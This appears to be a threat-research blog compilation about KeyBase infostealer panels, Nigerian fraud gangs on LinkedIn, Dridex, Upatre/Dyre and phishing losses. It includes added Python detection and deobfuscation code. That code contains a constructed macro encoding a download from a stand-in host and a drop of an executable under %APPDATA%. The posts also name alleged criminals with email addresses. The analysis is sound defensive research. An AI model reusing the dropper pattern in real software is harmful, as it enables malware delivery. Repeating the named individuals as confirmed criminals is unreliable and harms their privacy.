LinkedIn has approximately 414m active users, a portion of which are completely fake. This practice has been observed in the past with fake recruiters targeting researchers.

This content is the result of the same 'gang' of Nigerian criminals who favour KeyBase to steal sensitive credentials. I've observed these gangs (along with @techhelplist, who finds a lot of the details included here) using LinkedIn as a new platform to perform attempted financial fraud.

A large number of the screenshots shared with me are the result of a misconfigured KeyBase panel: there is a well known bug in KeyBase which allows unauthenticated access to the /images/ directory to anyone who knows how to locate it. Palo Alto have listed a large number here.

A percentage of determined sock puppets are using LinkedIn as a means of defrauding a significant number of businesses in the following countries:

UAE

US

UK

Figures are derived from the companies targeted in the panel images.

The sectors targeted include Real Estate, Investment and Law. This kind of fraud is complex in the sense that it requires geographically dispersed criminals to 'link up' in order to be successful. The fraud is highly likely committed from Nigeria (thanks to @techhelplist again, who helped ID the content and the fraud gang). The concept is simple: offering investment or seeking investment, depending on the potential victim.

The belief that this fraudulent operation is run from Nigeria rests on the evidence provided, which included active Facebook content and helpful photographs of places of work and of friends associated with the gang.

The image below is taken from a panel and shows our 'guy' logged into a LinkedIn profile, with a large number of messages all carrying the same content.

Seeking investment or offering investment.

@malwarehunterteam do a great job of supplying a large number of samples of various malware. iSpy came to my attention recently, and its codebase is almost identical to KeyBase, with both employing the same stealing functions. I will post a more detailed article on iSpy when I get time.

Reconnaissance message

We offer secured loans or funds to individuals and companies at low interest rates. We offer long and short term loans or funding of any projects. Our firm has recorded a lot of breakthroughs in the provision of first-class financial services to our clients.

— Akeem

The message above is pretty static and appears to be sent to a large number of potential victims. The method of communication varies across email providers. If you believe you've been approached by this gang, or have been part of the attempted fraud process, please contact me; I can share a number of verified IOCs.

The image below is a capture from the /images/ directory which includes a conversation with the 'master', who shares the devices used to perform the initial reconnaissance. Pg.5 of this alludes to the hierarchy involved.

In summary, this attempted fraud via social networks should deliver a clear message: nobody is who you believe they are, particularly when dealing with financial transactions.

FireEye produced a research article on the thriving economy of 'scammers' operating out of Nigeria. Pg.11 is of interest in the context of the content here.

The scammers use a variety of tools for distributing these exploits and keyloggers, such as email extractors, email notifiers, bulk mailing providers, and VPN/proxy providers. The email extractors help scammers scrape email addresses of potential targets from various sites which are fed to bulk mailing applications. They use proxy providers as a precaution when logging into their victims' accounts to hide their IP addresses. They also use email notifiers to monitor incoming emails.

Trust, but verify is a mantra that I preach. It's disappointing that LinkedIn does not have any method of formal verification for its users. There is no PGP or Keybase.io input required; even most DNMs require some form of ID verification!

@thegrugq makes the point far more eloquently than I ever could. In short, the game of cyber security has changed, and the context in which you operate, or call your working environment, is someone else's lunch.

There are some interesting aspects to this research: one is being able to understand and analyse how criminals operate. Another is seeing how other researchers operate.

Recently there have been a number of incidents involving what has been described as 'white hackers'. I don't have a term which sufficiently describes the work, other than 'interesting'.

Who IS the Batman?

Last month, I noted that someone had replaced the malicious content usually delivered by Dridex with Avira and a 'calling card'. The calling card gave information on the content of the compromised server, and intelligence which I believe was intended to identify the original owner or the original compromiser of the site.

I've again been collating the intel behind this person, or team, who are quickly re-compromising hosts after they have been compromised and listing the details relating to the original compromise.

Following up to now? Good!

Legit site --> compromised ---> compromised again and details posted to identify the original actor.

Recently, a compromised site, hxxp://www.wakeupforpeace.org.au/crimeware-server-readme.txt (Freezepage link: http://www.freezepage.com/1456771380KTQSEGLOJB),

has been 'done' by what could be the same actors/team previously observed in the Dridex 'incident'. I may well be wrong, but the details are strikingly similar.

The site itself is a simple phisher, looking for PayPal/banking credentials, and some really bad PHP handles the theft.

hadhemiaouini92@gmail.com

If anything, this should teach you:

Do not use your own name for an email address if you're going to use it to receive the proceeds of crime.

In essence it steals sensitive credentials; here is some of the PHP used to steal the data:

A lot of thanks should go to the great work that @malwarehunterteam, @James_MHT and @Techhelplist are doing to promote the discovery and takedown of these panels. I have privately, and legally, observed some of the content that is being stolen by the criminals, and it is extremely sensitive material.

Welcome to KeyBase

KeyBase, as mentioned, is an infostealer, and the Palo Alto write-up discusses its capabilities in much greater detail than I will.

KeyBase arrives by spoofed mail, often disguised as office documents or with double extensions; here is an example.

So, the research and analysis went on, and the content became richer. Researchers in certain circles are critically aware of a known bug in KeyBase, and further bugs add to the information being less than secure; this is highlighted in the Palo Alto article. All information was secured legally.

The comical aspect which prompted this post was the fact that KeyBase itself is not advanced. It is very noisy and it does not encrypt data in its network communications, so perimeter security will detect its patterns as it attempts to exfiltrate sensitive information, as demonstrated by the image above with 'Window title' in the packet.

The panels themselves are usually not configured correctly; they are almost 'plug and play', and this is confirmed by the research done by Palo Alto. The screenshots below are all taken from a panel which was completely unsecured and available to view on the open web.

We quickly discovered that the 'miscreants' behind these panels had infected themselves; the reason for this is clear. The interesting screenshots include Facebook profiles and messages between the gangs.

So, critically: you'll note I have not obscured any content. Joseph Ikems - we've extracted content which was captured from his own panel, or from the friend with whom he's discussing the 'problems with the panel'.

However, it's probably more likely it was jeffjeff, as the panel's domain registration was closely named to this. The reasons for this are shown in part by the content below.

We have email. So, we've managed, or should I say he has given us, his email. The above screenshot shows the miscreant logged into a Yahoo mail account under the name 'dixion.tony'; let's assume it's dixion.tony@yahoo.com.

The most advanced threat intelligence platform in the world agrees: this is potentially our guy. He has history, and people are complaining about being scammed.

This began to get interesting as the exposed screenshots yielded more information, this time as the criminals began to actively target industries, setting up fake domains and fake businesses in an attempt to extort legitimate businesses once they had been compromised.

A tab open on 'Textile companies turkey'

The spam campaigns sent to the targets had been crafted to appear to come from a fake company, 'Jinatrading LLC', as shown below.

Jinatrading LLC

Looks to be having some 'issues'.

Website content

As the content began to become more peculiar, so did the screenshots captured from the panel. At one point Tony decided to log into Facebook.

Ehhh..Tony!

The total number of screenshots from Tony's own machines exceeds 90, and the total number of screenshots is over 200. Attempting to alert the victims sadly proved fruitless; a lot of them never responded.

The lessons learned, and not published here, are that the criminals behind this enterprise persisted in infecting themselves with their own stealer and failed to understand the technology they worked with. The details here are approximately 20% of what was extracted, including fake company registrations made to appear legitimate.

An aggressive financial motive was clear, and some element of muling was involved. The screenshots below show searches for how to clear money or 'cash out'.

How do i hide my stolen money breh?

Detailed IOCs are available upon request; some of the artefacts are searchable by hash and are listed on VT.

Since the beginning of the year Dridex has returned with a number of new features:

New botnet ID's targeting Germany

New persistence methods, including writing to start folders at shutdown

Increased CPU usage when executing (!)

AV targeting and debugger checks

A few samples I've analysed over the past few weeks have exhibited new capabilities, at least in terms of the delivery method and 'on disk' activity. 'Macroseses', as they are referred to in the current campaign, still prompt the user to enable macros and still use an AutoOpen mechanism to extract and run. The current delivery chain is as follows.

MWI > Doc > Macro > JavaScript > download a .jpg over HTTP > extract binary > execute in %appdata%

The developers appear to be experimenting with new capabilities, the malware i've observed recently appears to be using some rudimentary steganography.

Along with payload development, the content is undergoing some active anti-reversing tricks using debugger checks which stop execution if a debugger is detected, something I have not personally observed being used by Dridex this year.

Dridex is actively looking to avoid detection and will exit the process if it detects a debugger attached to it. Further advances to the payload include antivirus checks; this particular payload had checks for the Comodo Security suite.

I also observed some odd behaviour in relation to what is being described as 'white hat' activity by mainstream media. One payload was benign and delivered Avira Antivirus in the way I described above.

Some of the compromised sites hosting the Avira payload had what appeared to be a calling card left as a warning with cryptic messages relating to 'owner' or 'pwner?' and the host.

The final observation is the worrying strings associated with the detection of virtualisation.

Upatre has an identity crisis; it thinks it's an RSA encrypted document.

RSA?

Arriving in the form of a seemingly 'signed' RSA document branded with the RSA logo, this very clever change of tactic from the team behind the Upatre/Dyre campaigns uses something that would probably fool the most observant of people.

The junk displayed isn't an RSA key; it's just part of a macro which is part of the TTP associated with this particular campaign. Whilst it's not a new style, it's certainly very clever.

The strings are visible with the fake key being shown here.

The Dyre/Upatre combination is something that has been used and abused by the same threat actors for some time. This change of tactic, moving on from regular spam such as invoices and remittance advice to something which makes a genuine attempt at obscuring its payload, shows the constant development that Upatre is undergoing.

Here are some of the proxies in use by the botnet:


@techhelplist has been doing some work on identifying these routers and has a tracker on his site.

In the computer security context, a hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment

— https://en.wikipedia.org/wiki/Hacker_(computer_security)

HackingTeam had some questionable ethics in relation to business practices and had long been pursued by those who sought to confirm this, one such being Christopher Soghoian, who has relentlessly used his ability to raise the profile of this issue for the benefit of those being exploited by the likes of Hacking Team, VUPEN and Gamma.

The Gamma breach could be argued to be the start of identifying the characteristics of known 'corporate enemies', particularly those who provide EaaS, or Exploitation as a Service.

The interesting aspect of the Gamma breach was that it was not met with a fanfare of expectation. Much as Lizard Squad, Anonymous and LulzSec indirectly looked to gain notoriety with their actions, the only thing that brokered opinions on Gamma was their business dealings.

Soghoian commented in his PhD thesis on the approach that has become routine practice.

Assisting Big Brother has become a routine part of business, albeit one that some service providers would probably rather do without

Whilst the argument over government surveillance is a long, and now more popular, discussion amongst those who were none the wiser prior to the hacks, leaks and breaches, it does indicate that it's in the public interest to at least have a mandate for these discussions.

HackingTeam had been on the radar of privacy advocates for some time, and had been highlighted numerous times as dealing with oppressive regimes. The claim was vindicated once HT had been breached and the data appeared online, confirming numerous conversations with those regimes.

https://twitter.com/ClausHoumann/status/649487453502488577/photo/1

The distinction between breaches and hacks probably needs to be made clearer. If the motivation of a hacker is left to the conclusion of the victim, it's always going to be malicious. In the case of a company that chooses to sell 0day exploits in order to perform genocide, it's a hack; the opposite can be said if a company chooses to portray a political leader in a comical light, thereby offending a nation. That's a breach.

A business is only as strong as the capabilities that protect it, not only in a strategic or a governance manner but in a theoretical capacity.

Ubiquiti had $46m siphoned out of their accounts by way of a phishing email. This was disclosed in their SEC filings, and it demonstrates the level of losses that face a business as a result of phishing.

I spend a lot of my time tracking phishing campaigns and the associated botnets that make money, real money, from the fraudulent transactions that occur as a result of phishing campaigns. Often, mail campaigns arrive in the tens of thousands to unsuspecting recipients, and that threat is growing greater.

Do you have the capacity to receive unsolicited emails from spammers? Does your hardware capacity planning include daily spam campaigns?

Do you, as a spoofed sender, have the ability to take hundreds of disgruntled phone calls (see below from @Conradlongmore) and unparalleled traffic to your site from people wondering why 'you' are sending emails asking for payment, or whatever SE technique is being used to deliver the mails?

Are your customers and employees familiar with the disclosure of losses and third-party information that may follow from one of your employees opening a phishing email?

Can you cope financially with the fraudulent transactions that may occur as a result of these campaigns?

If you're unable to answer all of these questions with a firm 'Yes', I would show a great deal of concern in identifying the areas to which your business is exposed. If you have any capabilities for payment processing or receiving payments, then the risk of being phished is as great as ever.

$46m, think about that figure and consider if in relative terms you can afford that level of losses.

This time it is targeting researchers using Tor for anonymous research. I don't think it's in the interests of these actors to destroy the victims' drives unless they are a target; it's an assumption that only those using Tor for inspection of Dridex campaigns are being targeted.

I noticed when analysing a recent sample on Windows XP that it destroyed the MBR, and this seems to tally with Lexsi's research and the comments on Malekai's forum.

With its significant growth into Europe, Spain and France particularly being affected, this menace proves its capabilities with a sting in its tail.

I have recently analysed a sample of what appears to be a newer version of KeyBase.

Having been delivered as an executable inside a zip, the malware has the usual keylogging capabilities of most trojans, utilising native API calls to hook keyboard input and using HTTP to upload images of the desktop. In this instance the victims' data is being uploaded to a server which isn't as tightly managed as usual.

Here is the web panel.

Panel

Here are the uploaded screenshots, appended with date and times.

Uploads

Here are some screenshots of applications in use on the victims machines.

Skype

Someone about to do some online banking; the malware will capture keystrokes as well as screenshots.

Banking

Someone placing an order for some materials via Outlook.com.

Materials

We can see, encoded in the HTTP stream, the inclusion of specific keywords, including 'notepad' (which I launched) and the keystrokes typed, in the request to the C&C that uploads the screenshots.
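The detection opportunity this gives a defender, as an added example that is not the blog's code: because KeyBase sends the window title and keystrokes in clear text alongside its screenshot uploads (as noted here and in the 'Welcome to KeyBase' section), a plain proxy log is enough to flag infected hosts. The parameter names, hostnames and log lines below are constructed for illustration, not KeyBase's real ones.

```python
"""
Heuristic detection of clear-text keylogger exfiltration over HTTP, run over a
constructed proxy log.  Field names are assumptions, not the stealer's real
parameter names; the point is that nothing needs decrypting to spot it.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Markers the post observed in the clear-text request: a window title and
# typed keystrokes travelling to the C&C, plus screenshot uploads.
TITLE_KEYS = {"windowtitle", "window_title", "title"}
KEY_KEYS = {"keystrokes", "keystrokestyped", "keys"}
SCREENSHOT_PATH = re.compile(r"/images?/.*\.(?:png|jpe?g)$", re.I)

# Constructed proxy log: "<client> <method> <url> <user-agent>" per line.
SAMPLE_LOG = """\
10.0.0.5 GET http://example.test/panel/post.php?type=keystrokes&windowtitle=Untitled+-+Notepad&keystrokes=hello+world Mozilla/4.0
10.0.0.5 POST http://example.test/panel/images/10-0-0-5_20160301.jpg Mozilla/4.0
10.0.0.9 GET http://www.example.org/index.html?q=weather Mozilla/5.0
10.0.0.7 GET http://example.test/panel/post.php?type=keystrokes&windowtitle=Log+in+to+Online+Banking&keystrokes=user123%09Pa55w0rd Mozilla/4.0
"""

def parse_line(line):
    """Split one log line into client, method, URL and user agent."""
    client, method, url, agent = line.split(" ", 3)
    return client, method, url, agent

def inspect_request(method, url):
    """Return the list of indicators found in a single request."""
    parts = urlsplit(url)
    names = {k.lower() for k in parse_qs(parts.query)}
    hits = []
    if names & TITLE_KEYS:
        hits.append("window_title_in_clear")
    if names & KEY_KEYS:
        hits.append("keystrokes_in_clear")
    if method == "POST" and SCREENSHOT_PATH.search(parts.path):
        hits.append("screenshot_upload")
    return hits

def scan_log(text):
    """Return {client_ip: sorted indicators} for hosts that look infected."""
    infected = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        client, method, url, _ = parse_line(line)
        hits = inspect_request(method, url)
        if hits:
            infected.setdefault(client, set()).update(hits)
    return {ip: sorted(h) for ip, h in infected.items()}

def typed_data(url):
    """Recover the window title and keystrokes from one request (no decryption needed),
    which tells the responder what a victim actually leaked."""
    params = parse_qs(urlsplit(url).query)
    title = next((params[k][0] for k in params if k.lower() in TITLE_KEYS), "")
    keys = next((params[k][0] for k in params if k.lower() in KEY_KEYS), "")
    return title, keys

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG).items():
        print(ip, hits)
```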

Dyre/Dyreza has gotten some attention this week in relation to targeting banks. After tracking Dridex and other associated banking trojans, I've researched parts of the command and control infrastructure that is abused by Dyre/Dyreza.

The Dyre/Dyreza samples I analysed, upon infection, seek to communicate with a lot of compromised AirOS routers within the botnet.

Dyre

Not only AirOS is affected by Dyre/Dyreza.

RouterOS MikroTik

Recently, I recall reading on Krebs' blog that Lizard Squad's DDoS platform ran using backdoors on compromised routers. Whether this vector is using bruteforcing of potentially weak usernames and passwords in the same way Lizard Squad did, or a backdoor that ships with the routers for firmware upgrades, remains to be seen.

Dridex today reached full SSL capabilities for communication with the 'Supernodes': a few samples analysed today showed pure SSL connectivity to peer nodes in the botnet. This was something I feared was evolving, considering the active checking for modern sandbox analysis. Today this gives Dridex the ability to hide in SSL traffic, and the threat posed by this is threefold:

SSL traffic is a legal and political minefield; SSL interception even more so.

Companies at risk from spam campaigns are obligated to identify and mitigate the traffic, giving credence to the risk it poses, yet the research can't be done without intercepting SSL traffic.

Smaller companies who do not possess the financial, legal or technical abilities to intercept SSL traffic will not be able to cope with the already advanced threat.

Dridex campaigns are also spreading further into the EU, with CERT-FR today posting an alert in relation to the campaigns actively targeting France.

Dridex botnets 220, 125 and 120 are now the number one risk posed to businesses that use email as a means of communication. The success rates and high turnover in terms of IP infrastructure associated with Dridex make it clear that it's a successful tool for criminals.

Whilst everything is being done to monitor backdoors, these threats are coming in through the front door.

Dridex seems to be the most prevalent form of malware targeting businesses. Since the turn of the year I've thrown some numbers around about how Dridex is:

Targeting the UK Retail & Finance industry

Evolved using PowerShell (platform dependent)

Uses rudimentary encryption (ROT13) to attempt to avoid analysis

A newer twist to Dridex is the attempt to circumvent some commercial virtualisation. Here is a snippet from one of the samples freely available on Malwr.com or via the excellent hybrid-analysis.com.

Once the sample was detonated I could see it would drop files in %temp%, and in those temp files are the configuration details for the sample currently detonating; it is explicitly attempting to detonate on 'tin', for lack of a better phrase. Didier had encountered this sample, and came to the same conclusion as me.

I prefer to inspect the malicious Word document via Python scripts rather than detonate it in a sandbox.

I again refer to the excellent BotConf I attended in December, and the talk from Paul Jung discussing sandbox detection.

When inspecting the malicious documents I highly recommend http://www.decalage.info/ and the olevba.py script, which can not only dump the macro and read encoded base64 strings, but will prettify the content into tables for 'reporting'.
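As an added example for the ROT13 point in the list above and the static inspection recommended here (my code, not olevba's and not the blog's): once olevba has dumped the macro text, the rudimentary ROT13 that Dridex uses to hide its strings can be undone by trying ROT13 on every string literal and keeping the ones that look more like a URL, path or API name after decoding. The macro below is constructed to mimic the described chain (AutoOpen, a .jpg over HTTP, a drop under %appdata%) and is not a real sample; `Run` in it is a placeholder, not a real call.

```python
"""
Recover ROT13-obfuscated strings from a dumped VBA macro.  SAMPLE_VBA is a
constructed stand-in for olevba output, not a real Dridex document.
"""
import codecs
import re

# Constructed macro: a hand-rolled ROT13 helper plus AutoOpen using it.
SAMPLE_VBA = r'''
Private Function R(s As String) As String
    Dim i As Integer, c As Integer
    For i = 1 To Len(s)
        c = Asc(Mid(s, i, 1))
        If c >= 65 And c <= 90 Then c = (c - 65 + 13) Mod 26 + 65
        If c >= 97 And c <= 122 Then c = (c - 97 + 13) Mod 26 + 97
        R = R & Chr(c)
    Next i
End Function

Sub AutoOpen()
    Dim url As String, dst As String
    url = R("uggc://rknzcyr.grfg/vzntrf/cvp.wct")
    dst = R("%NCCQNGN%\hcqngr.rkr")
    Call Run(R("JFpevcg.Furyy"), url, dst)
    MsgBox "Document protected. Please enable macros."
End Sub
'''

# VBA string literal; a doubled quote inside is an escaped quote.
STRING_LITERAL = re.compile(r'"((?:[^"\n]|"")*)"')
# Substrings that make a decoded string meaningful to the delivery chain.
INDICATORS = ("http://", "https://", ".jpg", ".exe", "%appdata%",
              "wscript", "shell", "cmd")
# Tell-tale arithmetic of a hand-rolled ROT13 routine.
ROT13_ROUTINE = re.compile(r"\+\s*13\)\s*Mod\s*26", re.I)

def rot13(s):
    return codecs.decode(s, "rot_13")

def score(s):
    """Count the indicators a string contains (case-insensitive)."""
    low = s.lower()
    return sum(1 for ind in INDICATORS if ind in low)

def has_rot13_routine(vba):
    """True if the macro carries its own ROT13 implementation."""
    return bool(ROT13_ROUTINE.search(vba))

def decode_strings(vba):
    """Return [(raw, decoded)] for literals that score higher after ROT13."""
    found = []
    for m in STRING_LITERAL.finditer(vba):
        raw = m.group(1).replace('""', '"')
        dec = rot13(raw)
        if score(dec) > score(raw):
            found.append((raw, dec))
    return found

if __name__ == "__main__":
    print("ROT13 routine present:", has_rot13_routine(SAMPLE_VBA))
    for raw, dec in decode_strings(SAMPLE_VBA):
        print(f"{raw!r} -> {dec!r}")
```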